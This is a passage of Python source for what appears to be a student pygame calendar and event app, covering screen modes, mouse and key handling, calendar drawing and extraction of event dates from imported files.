self.locationText=\"\"\n boxWidth=200\n boxHeight=35\n self.locationInputBox=[43,435,boxWidth,boxHeight,self.orange]\n\n#########################\n### Main Framework ######\n#########################\n def init(self):\n self.mode = \"sign\"\n self.currentPos=(-1,-1)\n self.initColor()\n self.signButtons()\n self.loadFont()\n self.w = 0\n self.h1 = 0\n self.h2 = 0\n self.h3 = 0\n self.h4 = 0\n self.h5 = 0\n self.num = 0\n self.calendarColor = []\n for row in range(5): self.calendarColor += [[1]*7]\n #14 modes \n self.modeLst=[\"sign\",\"interest\",\"main\",\"hand\",\"libraryInput\",\"camera\"\\\n \"calendar\",\"working\",\"finish\",\"calendarYes\",\"calendarNo\",\\\n \"calendarMarch\",\"calendarMay\",\"community\"\\\n \"communityFriends\",\"threeIcon\"]\n self.path = None\n self.buttons()\n self.week = ['Sun','Mon','Tus','Wed','Thr','Fri','Sat']\n self.day = []\n for row in range(5): self.day += [[0]*7]\n self.userImg = pygame.image.load('orange.png')\n self.instaImg = pygame.image.load('instagram.png')\n self.snapImg = pygame.image.load('snapchat1.png')\n self.fbImg = pygame.image.load('fb1.png')\n self.oImg = pygame.image.load('o.png')\n self.friendImg = pygame.image.load('login1.png')\n self.messageImg = pygame.image.load('bubble.png')\n self.backImg = pygame.image.load('back4.png')\n self.addImg = pygame.image.load('add3.png')\n self.doneImg = pygame.image.load('done2.png')\n self.mannualImg = pygame.image.load('manual2.png')\n self.searImg = pygame.image.load('search1.png')\n self.setImg = pygame.image.load('set2.png')\n self.calImg = pygame.image.load('calendar1.png')\n self.comImg = pygame.image.load('community1.png')\n self.camImg = pygame.image.load('camera2.png')\n self.libImg = pygame.image.load('lib1.png')\n self.info=[]\n self.numlist=[]\n self.handInput=[self.titleText,self.dateInput,self.beginTimeText,self.endTimeText,self.locationText]\n \n \n #self.loadLogo() xh\n #self.loadShareLogo() xh\n\n#### MousePressed ####\n def mousePressedSign(self,x,y):\n if self.mode==\"sign\":\n #signInBtn\n surface= self.signInBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.deepOrange\n #signUpBtn\n surface=self.signUpBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.deepOrange\n \n def mousePressedMain(self,x,y):\n if self.mode==\"main\":\n if (x-268)**2+(y-779)**2<=6400 and y<819:\n self.mainCircle[0]=self.deepOrange\n btn=self.mainCommunityBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.deepOrange\n btn=self.mainCalendarBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.deepOrange\n \n def mousePressedThreeIcon(self,x,y):\n if self.mode==\"threeIcon\":\n if (x-160)**2+(y-679)**2<=1600:\n self.handCircle[0]=self.deepOrange\n \n if (x-268)**2+(y-639)**2<=1600:\n self.libraryInputCircle[0]=self.deepOrange\n \n if (x-376)**2+(y-679)**2<=1600:\n self.cameraCircle[0]=self.deepOrange\n \n if (x-268)**2+(y-779)**2 <=6400 and y < 819:\n self.mainCircle[0]=self.deepOrange\n \n def mousePressedLibraryInput(self,x,y):\n if self.mode==\"libraryInput\":\n surface=self.importButtons\n if (x-268)**2+(y-500)**2<=200**2:\n surface[1]=self.deepOrange\n \n def mousePressedCommunity(self,x,y):\n if self.mode==\"community\":\n surface=self.friendEventBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.deepOrange\n \n surface=self.localEventBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.deepOrange\n \n\n\n#### Open File Browser ####\n def open_file_browser(self):\n pygame.mixer.init() # initializing the mixer\n import tkinter\n from tkinter import filedialog\n\n root = tkinter.Tk()\n root.withdraw()\n root.filename = filedialog.askopenfilename(initialdir=\"/\", title=\"Select file\",\n filetypes=((\"jpeg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\n return root.filename\n\n#### MouseReleased ####\n def mouseReleasedSign(self,x,y):\n if self.mode==\"sign\":\n #signInBtn\n surface= self.signInBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.orange\n self.mode=\"main\"\n #signUpBtn\n surface=self.signUpBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.orange\n self.mode=\"interest\"\n \n def mouseReleasedThreeIcon(self,x,y):\n if self.mode==\"threeIcon\":\n if (x-268)**2+(y-779)**2 <=6400 and y < 819:\n self.mode = \"main\"\n print(\"jgso\")\n self.mainCircle[0]=self.orange\n \n elif (x-160)**2+(y-679)**2<=1600:\n self.handCircle[0]=self.orange\n self.mode=\"hand\"\n \n elif (x-268)**2+(y-639)**2<=1600:\n self.libraryInputCircle[0]=self.orange\n self.mode=\"libraryInput\"\n \n elif (x-376)**2+(y-679)**2<=1600:\n self.cameraCircle[0]=self.orange\n\n\n def mouseReleasedMain(self,x,y):\n if self.mode==\"main\":\n if (x-268)**2+(y-779)**2<=6400 and y<819:\n self.mainCircle[0]=self.orange\n self.mode=\"threeIcon\"\n \n btn=self.mainCommunityBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.orange\n self.mode=\"community\"\n \n btn=self.mainCalendarBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.orange\n self.mode=\"calendar\"\n\n \n def mousePressCalendar(self,x,y):\n if self.mode==\"calendar\":\n for i in range(5):\n for j in range(7):\n if self.within(260-223,40+100-20,100,100,x,y):\n self.mode = \"calendarMarch\"\n elif self.within(720-223-50,40+100-20,100,100,x,y):\n self.mode = \"calendarMay\"\n\n def mousePressedCalendarMarch(self,x,y):\n if self.mode == \"calendarMarch\":\n if self.within(720-223-50,40+100-20,100,100,x,y):\n self.mode = \"calendar\"\n\n def mousePressedCalendarMay(self,x,y):\n if self.mode == \"calendarMay\":\n if self.within(260-223,40+100-20,100,100,x,y):\n self.mode = \"calendar\"\n\n def mousePressedOrange(self,x,y):\n if self.mode == \"working\":\n if self.within(30,600,30+90,600+90,x,y):\n self.numlist.append(1)\n self.num = 1\n elif self.within(130,600,90,90,x,y):\n self.numlist.append(2)\n self.num = 2\n elif self.within(230,600,90,90,x,y):\n self.numlist.append(3)\n self.num = 3\n elif self.within(330,600,90,90,x,y):\n self.numlist.append(4)\n self.num = 4\n elif self.within(430,600,90,90,x,y):\n self.numlist.append(5)\n self.num = 5\n self.extractInfo()\n self.time()\n\n def mousePressed(self,x,y):\n self.mousePressedSign(x,y)\n self.mousePressedLibraryInput(x,y)\n self.mousePressCalendar(x,y)\n self.mousePressedCalendarMarch(x,y)\n self.mousePressedCalendarMay(x,y)\n self.mousePressedCommunity(x,y)\n self.mousePressedThreeIcon(x,y)\n self.mousePressedOrange(x,y)\n self.mousePressedMain(x,y)\n\n def mouseReleasedLibraryInput(self,x,y):\n if self.mode==\"libraryInput\":\n surface=self.importButtons\n if (x-268)**2+(y-500)**2<=200**2:\n surface[1]=self.orange\n self.path=self.open_file_browser()\n if self.path!=\"\":\n self.mode=\"working\"\n \n def mouseReleasedBack(self,x,y):\n if self.within(0,0,60,45,x,y):\n if self.mode==\"interest\":\n self.mode=\"sign\"\n elif self.mode==\"libraryInput\":\n self.mode=\"main\"\n elif self.mode==\"camera\":\n self.mode=\"main\"\n elif self.mode==\"hand\":\n self.mode=\"main\"\n elif self.mode==\"community\":\n self.mode=\"main\"\n elif self.mode==\"calendar\":\n self.mode=\"main\"\n elif self.mode==\"calendarYes\":\n self.mode=\"calendar\"\n elif self.mode==\"calendarNo\":\n self.mode=\"calendar\"\n elif self.mode==\"finish\":\n self.mode=\"libraryInput\"\n elif self.mode==\"communityFriends\":\n self.mode=\"community\"\n \n def mouseReleasedDone(self,x,y):\n if self.within(536-60,0,60,45,x,y):\n if self.mode==\"finish\":\n self.mode=\"main\"\n elif self.mode==\"hand\":\n self.mode=\"main\"\n elif self.mode==\"interest\":\n self.mode=\"main\"\n \n \n def mouseReleasedCommunity(self,x,y):\n if self.mode==\"community\":\n surface=self.friendEventBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.orange\n self.mode=\"communityFriends\"\n \n surface=self.localEventBtn\n if self.within(surface[0],surface[1],surface[2],surface[3],x,y):\n surface[4]=self.orange\n \n def mouseReleasedCalendar(self,x,y):\n if self.mode == \"calendar\":\n for i in range(5):\n for j in range(7):\n if self.day[i][j] == 0:\n if self.within(250 + j *70-223, 130 + i * 70+100, 60, 60,x,y):\n self.mode = \"calendarNo\"\n elif self.day[i][j] >= 1:\n if self.within(250 + j *70-223, 130 + i * 70+100, 60, 60,x,y):\n self.mode = \"calendarYes\"\n\n def mouseReleased(self,x,y):\n self.mouseReleasedSign(x,y)\n self.mouseReleasedCalendar(x,y)\n self.mouseReleasedLibraryInput(x,y)\n self.mouseReleasedBack(x,y)\n self.mouseReleasedDone(x,y)\n self.mouseReleasedThreeIcon(x,y)\n self.mouseReleasedMain(x,y)\n self.mouseReleasedCommunity(x,y)\n print(self.mode)\n \n#### MouseMotion ####\n def mouseMotionSign(self,x,y):\n if self.mode==\"sign\":\n btn=self.signInBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n btn=self.signUpBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange\n \n\n def mouseMotionInterest(self,x,y):\n if self.mode==\"interest\":\n if len(self.interestButtonList)!=0:\n for btn in self.interestButtonList:\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n \n def mouseMotionMain(self,x,y):\n if self.mode==\"main\":\n for btn in [self.mainEvent1,self.mainEvent2,self.mainEvent3]:\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n \n if (x-268)**2+(y-779)**2<=6400 and y<819:\n self.mainCircle[0]=self.darkOrange\n else:\n self.mainCircle[0]=self.orange\n \n btn=self.mainCommunityBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange\n \n btn=self.mainCalendarBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange\n \n def mouseMotionThreeIcon(self,x,y):\n if self.mode==\"threeIcon\":\n if (x-160)**2+(y-679)**2<=1600:\n self.handCircle[0]=self.darkOrange\n else:\n self.handCircle[0]=self.orange\n \n if (x-268)**2+(y-639)**2<=1600:\n self.libraryInputCircle[0]=self.darkOrange\n else:\n self.libraryInputCircle[0]=self.orange\n \n if (x-376)**2+(y-679)**2<=1600:\n self.cameraCircle[0]=self.darkOrange\n else:\n self.cameraCircle[0]=self.orange\n \n if (x-268)**2+(y-779)**2<=6400 and y<819:\n self.mainCircle[0]=self.darkOrange\n else:\n self.mainCircle[0]=self.orange\n \n def mouseMotionLibraryInput(self,x,y):\n if self.mode==\"libraryInput\":\n surface=self.importButtons\n if (x-268)**2+(y-500)**2<=200**2:\n surface[1]=self.darkOrange\n else:\n surface[1]=self.orange\n \n # def mouseMotionFinish(self,x,y):\n # if self.mode==\"finish\":\n \n def mouseMotionCommunity(self,x,y):\n if self.mode==\"community\":\n btn=self.friendEventBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n \n btn=self.localEventBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n \n def mouseMotionCalendar(self,x,y):\n if self.mode==\"calendar\":\n for i in range(5):\n for j in range(7):\n if self.within(250 + j *70-223, 130 + i * 70+100, 60, 60,x,y):\n self.calendarColor[i][j] = 1\n else:\n self.calendarColor[i][j] = 0\n \n def mouseMotionPreference(self,x,y):\n if self.mode==\"preference\":\n btn=self.preferenceBtn\n if self.within(btn[0],btn[1],btn[2],btn[3],x,y):\n btn[4]=self.darkOrange\n else:\n btn[4]=self.orange \n\n def mouseMotion(self, x, y):\n self.mouseMotionSign(x,y)\n self.mouseMotionInterest(x,y)\n self.mouseMotionMain(x,y)\n self.mouseMotionLibraryInput(x,y)\n self.mouseMotionCommunity(x,y)\n self.mouseMotionCalendar(x,y)\n self.mouseMotionPreference(x,y)\n self.mouseMotionThreeIcon(x,y)\n\n def keyPressed(self, keyCode, modifier,pos):\n x=pos[0]\n y=pos[1]\n if self.mode==\"hand\":\n if 97<=keyCode<=122:\n addText=chr(keyCode-32)\n else:\n addText=chr(keyCode)\n if 43<=x<=43+450 and 150<=y<=150+35:\n if keyCode==127:\n self.titleText=self.titleText[:-1]\n else:\n self.titleInputBox[4]=self.darkOrange\n self.titleText+=addText\n else:\n self.dateInputBox[4]=self.orange\n \n if 43<=x<=43+200 and 245<= y <=245+35:\n if keyCode==127:\n self.dateText=self.dateText[:-1]\n else:\n self.dateInputBox[4]=self.darkOrange\n self.dateText+=addText\n else:\n self.dateInputBox[4]=self.orange\n \n if 43<=x<=43+100 and 340<= y <=340+35:\n if keyCode==127:\n self.beginTimeText=self.beginTimeText[:-1]\n else:\n self.beginTimeInputBox[4]=self.darkOrange\n self.beginTimeText+=addText\n else:\n self.beginTimeInputBox[4]=self.orange\n \n if 158<=x<=158+100 and 340<=y<=340+35:\n if keyCode==127:\n self.endTimeText=self.endTimeText[:-1]\n else:\n self.endTimeInputBox[4]=self.darkOrange\n self.endTimeText+=addText\n else:\n self.endTimeInputBox[4]=self.orange\n \n if 43<=x<=43+200 and 435<=y<=435+35:\n if keyCode==127:\n self.locationText=self.locationText[:-1]\n else:\n self.locationInputBox[4]=self.darkOrange\n self.locationText+=addText\n else:\n self.locationInputBox[4]=self.orange\n if self.mode==\"interest\":\n if 43<=x<=43+450 and 150<=y<=150+35:\n if 97<=keyCode<=122:\n addText=chr(keyCode-32)\n else:\n addText=chr(keyCode)\n if keyCode !=13:\n if keyCode==127:\n self.interestInput=self.interestInput[:-1]\n else:\n self.interestInputBox[4]=self.darkOrange\n self.interestInput+=addText\n else:\n self.interestList+=[self.interestInput]\n self.interestInput=\"\"\n def getInterestList(self):\n return self.interestList\n \n def drawInputBox(self,screen):\n list=[self.titleInputBox,self.dateInputBox,self.beginTimeInputBox,self.endTimeInputBox,self.locationInputBox]\n for surface in list:\n pygame.draw.rect(screen,surface[4],surface[:4])\n \n def drawInputBoxText(self,screen):\n self.displayTextAlignLeft(screen,self.titleText,43,150,\\\n self.black,self.regularFont)\n self.displayTextAlignLeft(screen,self.dateText,43,245,self.black,self.regularFont)\n self.displayTextAlignLeft(screen,self.beginTimeText,43,340,self.black,self.regularFont)\n self.displayTextAlignLeft(screen,self.endTimeText,158,340,self.black,self.regularFont)\n self.displayTextAlignLeft(screen,self.locationText,43,435,self.black,self.regularFont)\n \n def drawInterestInput(self,screen):\n pygame.draw.rect(screen,self.interestInputBox[4],self.interestInputBox[:4])\n self.displayTextAlignLeft(screen,self.interestInput,43,150,self.black,self.regularFont)\n \n def keyReleased(self, keyCode, modifier):\n pass\n \n \n\n\n#### timerFried ####\n\n def timerFired(self, dt):\n if self.mode == \"working\":\n self.orangeTimerFired(dt)\n self.loadTimerFired(dt)\n \n def orangeTimerFired(self,dt):\n if self.num == 1:\n if self.h1 > -100:\n self.h1 -= 10\n elif 0 > self.h1:\n self.h1 += 30\n\n elif self.num == 2:\n if self.h2 < 100:\n self.h2 += 10\n elif 0 < self.h2:\n self.h2 -= 30\n\n elif self.num == 3:\n if self.h3 < 100:\n self.h3 += 10\n elif 0 < self.h3:\n self.h3 -= 30\n\n elif self.num == 4:\n if self.h4 > -100:\n self.h4 -= 10\n elif 0 > self.h4:\n self.h4 += 30\n\n elif self.num == 5:\n if self.h5 < 100:\n self.h5 += 10\n elif 0 < self.h5:\n self.h5 -= 30\n\n \n def loadTimerFired(self,dt):\n if self.w < 350:\n self.w += 1\n if self.w == 350:\n self.mode = \"finish\"\n \n###########################\n#draw\n###########################\n def drawSignButtons(self,screen):\n pygame.draw.rect(screen, self.signInBtn[4], self.signInBtn[:4])\n pygame.draw.rect(screen, self.signUpBtn[4], self.signUpBtn[:4])\n self.displayText(screen,\"Sign In\",118,475,300,40,self.grey,self.regularFont)\n self.displayText(screen,\"Log In\", 118,535,300,40,self.grey,self.regularFont)\n \n #change\n def drawSign(self,screen):\n screen.fill(self.grey)\n screen.blit(self.userImg,(80,70))\n screen.blit(self.fbImg,(125,630))\n screen.blit(self.instaImg,(235.3,630))\n screen.blit(self.snapImg,(344,630))\n\n def drawBackBtn(self,screen):\n screen.blit(self.backImg,(0,0))\n \n def drawAddBtn(self,screen):\n screen.blit(self.addImg, (546,0))\n \n def drawDoneBtn(self,screen):\n screen.blit(self.doneImg, (546,0))\n \n \n # change\n def drawSearchBtn(self,screen,loc):\n screen.blit(self.searImg, loc)\n \n # change\n def drawSettingBtn(self,screen):\n screen.blit(self.setImg, (450,0))\n \n # change\n def drawCalBtn(self,screen):\n screen.blit(self.calImg, (268+50+80,10+739))\n \n # change\n def drawComBtn(self,screen):\n screen.blit(self.comImg, (50+20,739))\n # add\n def drawEventBtn(self,screen,color,loc):\n pygame.draw.rect(screen,color,loc)\n \n def drawText(self,text,screen,a,b,c,d):\n self.displayText(screen,str(\"Title: \"+text[0]),a,b,c,d,self.white,self.regularFont)\n self.displayText(screen,str(\"Date: \"+text[1]),a,b,c,d+50,self.white,self.regularFont)\n self.displayText(screen,str(\"Time: \"+text[2]),a,b,c,d+100,self.white,self.regularFont)\n self.displayText(screen,str(\"Loc: \"+text[3]),a,b,c,d+150,self.white,self.regularFont)\n \n \n \n def drawMainBtn(self,screen):\n pygame.draw.rect(screen,self.mainCommunityBtn[4],(0,739,268,80))\n pygame.draw.rect(screen,self.mainCalendarBtn[4],(268,739,268,80))\n pygame.draw.circle(screen,self.mainCircle[0],(268,779),80)\n\n def drawSubpage(self,screen):\n screen.fill(self.grey)\n self.drawShades(screen,self.white,0,0,self.width,45)\n screen.blit(self.backImg,(10,0))\n \n \n def drawShades(self, screen, color, a, b, c, d):\n pygame.draw.rect(screen,(160,160,160),(a-7,b-7,c+14,d+14))\n pygame.draw.rect(screen,(170,170,170),(a-6,b-6,c+12,d+12))\n pygame.draw.rect(screen,(190,190,190),(a-5,b-5,c+10,d+10))\n pygame.draw.rect(screen,(210,210,210),(a-4,b-4,c+8,d+8))\n pygame.draw.rect(screen,(230,230,230),(a-3,b-3,c+6,d+6))\n pygame.draw.rect(screen,(240,240,240),(a-2,b-2,c+4,d+4))\n pygame.draw.rect(screen,(250,250,250),(a-1,b-1,c+2,d+2))\n pygame.draw.rect(screen, color, (a,b,c,d))\n \n def drawCalendarButton(self,screen,color, fontColor, a, b, c, d, text,font, width = 0):\n pygame.draw.rect(screen, color, (a,b,c,d), width)\n myFont = font\n textSurface = myFont.render(text, True, fontColor)\n textRect1 = textSurface.get_rect()\n textRect1.center = (a + c/2, b + d/2)\n screen.blit(textSurface, textRect1)\n \n def drawLeftRightButton(self,screen, color, loc):\n pygame.draw.polygon(screen, color, loc)\n \n def calendarMarch(self,screen):\n self.drawSubpage(screen)\n x = -223\n y = 100\n self.drawCalendarButton(screen,self.grey, self.orange, 250+x, 10+y, 480, 50, \"March, 2018\",self.regularFont)\n self.drawLeftRightButton(screen,self.orange,((260+x,55+y-20),(290+x,40+y-20),(290+x,70+y-20)))\n self.drawLeftRightButton(screen,self.orange,((720+x,55+y-20),(690+x,40+y-20),(690+x,70+y-20)))\n for i in range(7):\n self.drawCalendarButton(screen,self.grey,self.white,250 + i * 70+x, 90+y, 60, 30, self.week[i], self.weekFont)\n day = 29\n for i in range(5):\n for j in range(7):\n if i == 0 and j < 4: continue\n if i ==0 and j == 4:\n day = 1\n self.drawCalendarButton(screen,self.grey, self.orange, 250 + j *70+x, 130 + i * 70+y, 60, 60, str(day), self.calendarFont)\n day += 1\n screen.blit(self.oImg, (80,700))\n \n def calendarApril(self,screen):\n \n self.drawSubpage(screen)\n x = -223\n y = 100\n self.drawCalendarButton(screen,self.grey, self.orange, 250+x, 10+y, 480, 50, \"April, 2018\",self.regularFont)\n self.drawLeftRightButton(screen,self.orange,((260+x,55+y-20),(290+x,40+y-20),(290+x,70+y-20)))\n self.drawLeftRightButton(screen,self.orange,((720+x,55+y-20),(690+x,40+y-20),(690+x,70+y-20)))\n for i in range(7):\n self.drawCalendarButton(screen,self.grey,self.white,250 + i * 70+x, 90+y, 60, 30,self.week[i], self.weekFont)\n \n day = 29\n for i in range(5):\n for j in range(7):\n if i == 4 and j > 2: continue\n if i ==0 and j == 0:\n day = 1\n if self.calendarColor[i][j] == 0 :\n self.drawCalendarButton(screen,self.grey, self.orange, 250 + j *70+x, 130 + i * 70+y, 60, 60, str(day), self.calendarFont)\n elif self.calendarColor[i][j] == 1:\n self.drawCalendarButton(screen,self.grey, self.white, 250 + j *70+x, 130 + i * 70+y, 60, 60, str(day), self.calendarFont)\n day = day + 1\n screen.blit(self.oImg, (80,700))\n \n #if recordMode == 11:\n # pygame.draw.rect(screen, orange, (250+x, 90+y,480 ,380))\n # myfont = pygame.font.SysFont('Comic Sans MS', 30)\n # textSurface = myFont.render(\"Date: Nov.\" + str(self.recordMode) + 'th', True, grey)\n # textRect1 = textSurface.get_rect()\n # textRect1.midleft = (300+x, 150+y)\n # screen.blit(textSurface, textRect1)\n # #Good\n \n # myfont = pygame.font.SysFont('Comic Sans MS', 30)\n # textSurface1 = myFont1.render(\"Condition : \" + \"Fair\", True, grey)\n # textRect2 = textSurface1.get_rect()\n # textRect2.midleft = (300+x, 200+y)\n # screen.blit(textSurface1, textRect2)\n \n def calendarMay(self,screen):\n self.drawSubpage(screen)\n x = -223\n y = 100\n self.drawCalendarButton(screen,self.grey, self.orange, 250+x, 10+y, 480, 50, \"May, 2018\", self.regularFont)\n self.drawLeftRightButton(screen,self.orange,((260+x,55+y-20),(290+x,40+y-20),(290+x,70+y-20)))\n self.drawLeftRightButton(screen,self.orange,((720+x,55+y-20),(690+x,40+y-20),(690+x,70+y-20)))\n for i in range(7):\n self.drawCalendarButton(screen,self.grey,self.white,250 + i * 70+x, 90+y, 60, 30, self.week[i], self.weekFont)\n \n day = 29\n for i in range(5):\n for j in range(7):\n if i == 0 and j < 2 or i == 4 and j > 4: continue\n if i ==0 and j == 2:\n day = 1\n self.drawCalendarButton(screen,self.grey, self.orange, 250 + j *70+x, 130 + i * 70+y, 60, 60, str(day), self.calendarFont)\n day = day + 1\n screen.blit(self.oImg, (80,700))\n \n \n def drawCommunityFriends(self,screen):\n self.drawSubpage(screen)\n screen.blit(self.friendImg,(20,180))\n screen.blit(self.friendImg,(20,380))\n screen.blit(self.friendImg,(20,580))\n screen.blit(self.messageImg, (140,150))\n screen.blit(self.messageImg, (140,350))\n screen.blit(self.messageImg, (140,550))\n \n def time(self):\n if len(self.gateDate())>2:\n date=self.gateDate()[1]\n i=date//7+1\n j=date-i*7\n self.day[i][j] += 1\n elif len(self.getDate()) == 2:\n for c in self.getDate():\n date = c[1]\n i = date//7+1\n j = date-i*7\n self.day[i][j] += 1\n \n \n def redrawCalendarYes(self,screen):\n if self.mode == \"calendarYes\":\n self.calendarYes(screen)\n drawText(self,[\"THE REVOLUTION\",\"APRIL 27\",\"\",\"FT.LAUDERDALE,FLORIDA\"],screen,self.mainEvent1[0],self.mainEvent1[1])\n if len(getDate) > 2:\n self.drawEventBtn(screen,self.mainEven2[4],self.mainEvent2[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent2[0],self.mainEvent2[1])\n else:\n self.drawEventBtn(screen,self.mainEven2[4],self.mainEvent2[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent2[0],self.mainEvent2[1])\n self.drawEventBtn(screen,self.mainEven3[4],self.mainEvent3[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent3[0],self.mainEvent3[1])\n \n def calendarNo(self,screen):\n self.drawSubpage(screen)\n x = -223\n y = 150\n yw = 0\n for i in range(7):\n self.drawCalendarButton(screen,self.grey,self.orange,250 + i * 70+x, 90+yw, 60, 30, self.week[i], self.weekFont)\n self.drawCalendarButton(screen,self.grey, self.orange, 250+x, 10+y, 480, 50,\"April 11, 2018\", self.regularFont)\n self.drawLeftRightButton(screen,self.orange,((260+x,55+y-20),(290+x,40+y-20),(290+x,70+y-20)))\n self.drawLeftRightButton(screen,self.orange,((720+x,55+y-20),(690+x,40+y-20),(690+x,70+y-20)))\n screen.blit(self.oImg,(170, 500))\n self.displayText(screen,'\"An Orange A Day',20,150,500,500,self.orange,self.cuteFont)\n self.displayText(screen,' Keeps Doctors Away\"',20,220,500,500,self.black,self.cuteFont)\n \n def displayText(self,screen,text,a,b,c,d,fontColor,font):\n myFont = font\n textSurface = myFont.render(text, True, fontColor)\n textRect1 = textSurface.get_rect()\n textRect1.center = (a + c/2, b + d/2)\n screen.blit(textSurface, textRect1)\n \n def displayTextAlignLeft(self,screen,text,a,b,fontColor,font):\n print(self.interestList)\n textSurface=font.render(text,True,fontColor)\n textRect1=textSurface.get_rect()\n screen.blit(textSurface,(a,b+5))\n \n def drawThreeIcon(self,screen):\n pygame.draw.circle(screen,self.handCircle[0],(160,679),40)\n screen.blit(self.mannualImg,(160-20,679-20))\n pygame.draw.circle(screen,self.libraryInputCircle[0],(268,639),40)\n screen.blit(self.libImg,(268-20,639-20))\n pygame.draw.circle(screen,self.cameraCircle[0],(376,679),40)\n screen.blit(self.camImg,(376-20,679-20))\n\n def drawOrangeBtn(self,screen,loc):\n screen.blit(self.oImg,loc)\n \n def drawInterestBar(self,screen):\n if len(self.interestList)==0:\n pass\n else:\n for i in range(0,len(self.interestList)):\n box=(43,250+20*i+35*i,len(self.interestList[i])*20,35)\n pygame.draw.rect(screen,self.orange,box)\n self.displayText(screen,self.interestList[i],43,250+20*i+35*i,len(self.interestList[i])*20,35,self.black,self.regularFont)\n \n \n######### get event #####\n def extractInfo(self):\n if self.mode == 'working':\n if self.numlist[0] == 1:\n self.info.append(getTextOne(self.path))\n elif self.numlist[0] == 2:\n infoDic = interestFilterTwo(self.path)\n if isinstance(infoDic,list):\n self.info += infoDic\n elif isinstance(infoDic,dict):\n self.info += [infoDic]\n elif self.numlist[0] == 3:\n infoDic = interestFilterThree(self.path)\n if isinstance(infoDic,list):\n self.info += infoDic\n elif isinstance(infoDic,dict):\n self.info += [infoDic]\n elif self.numlist[0] == 4:\n infoDic = interestFilterFour(self.path)\n if isinstance(infoDic,list):\n self.info += infoDic\n elif isinstance(infoDic,dict):\n self.info += [infoDic]\n elif self.numlist[0] == 5:\n infoDic = interestFilterFive(self.path)\n if isinstance(infoDic,list):\n self.info += infoDic\n elif isinstance(infoDic,dict):\n self.info += [infoDic]\n return self.info\n \n def getDate(self):\n if len(self.info) == 1:\n item = self.info[0]\n for key in item:\n if key == 'date':\n for numlike in item[key][0].split(' '):\n date=''\n if (len(numlike) == 2 and numlike.isdigit()):date=numlike\n elif (len(numlike) == 3 and (numlike[:-1].isdigit() and numlike[-1].isdigit()==False)):\n date=numlike[:-1]\n elif (len(numlike)==3 and numlike[1:].isdigit() and numlike[0].isdigit()==False):\n date=numlike[1:]\n elif (len(numlike) == 1 and numlike.isdigit()):date = numlike\n return [item['event'],date,item['location'],item['time']]\n elif len(self.info) == 2:\n item1 = self.info[0]\n for key in item1:\n if key == 'date':\n for numlike in item1[key][0].split(' '):\n date1=''\n if (len(numlike) == 2 and numlike.isdigit()):date1=numlike\n elif (len(numlike) == 3 and (numlike[:-1].isdigit() and numlike[-1].isdigit()==False)):\n date1=numlike[:-1]\n elif (len(numlike)==3 and numlike[1:].isdigit() and numlike[0].isdigit()==False):\n date1=numlike[1:]\n elif (len(numlike) == 1 and numlike.isdigit()):date1 = numlike\n item2 = self.info[1]\n for key in item2:\n if key == 'date':\n for numlike in item2[key][0].split(' '):\n date2=''\n if (len(numlike) == 2 and numlike.isdigit()):date2=numlike\n elif (len(numlike) == 3 and (numlike[:-1].isdigit() and numlike[-1].isdigit()==False)):\n date2=numlike[:-1]\n elif (len(numlike)==3 and numlike[1:].isdigit() and numlike[0].isdigit()==False):\n date2=numlike[1:]\n elif (len(numlike) == 1 and numlike.isdigit()):date2 = numlike\n return [[item1['event'],date1,item1['location'],item1['time']],\n [item2['event'],date2,item2['location'],item2['time']]] \n \n def time(self):\n if len(self.getDate()) >= 2:\n date = int(self.getDate()[1])\n i = date//7+1\n j = date-i*7\n self.day[i][j] += 1\n elif len(self.gateDate()) == 2:\n for c in self.gateDate():\n date = c[1]\n i = date//7+1\n j = date-i*7\n self.day[i][j] += 1\n \n \n \n\n############### redraw ####\n def redrawSign(self, screen):\n if self.mode == \"sign\":\n self.drawSign(screen)\n self.drawSignButtons(screen)\n \n def redrawInterest(self, screen):\n if self.mode == \"interest\":\n self.drawSubpage(screen)\n self.drawInterestInput(screen)\n self.drawInterestBar(screen)\n screen.blit(self.doneImg,(518-50,0))\n \n def redrawMain(self, screen):\n if self.mode == \"main\":\n screen.fill(self.grey)\n self.displayText(screen,\"New Events\", 200,80,0,0,self.white,self.topicFont)\n self.drawMainBtn(screen)\n self.drawEventBtn(screen,self.mainEvent1[4],self.mainEvent1[:4])\n self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent1[0],self.mainEvent1[1],100,70)\n self.drawEventBtn(screen,self.mainEvent2[4],self.mainEvent2[:4])\n 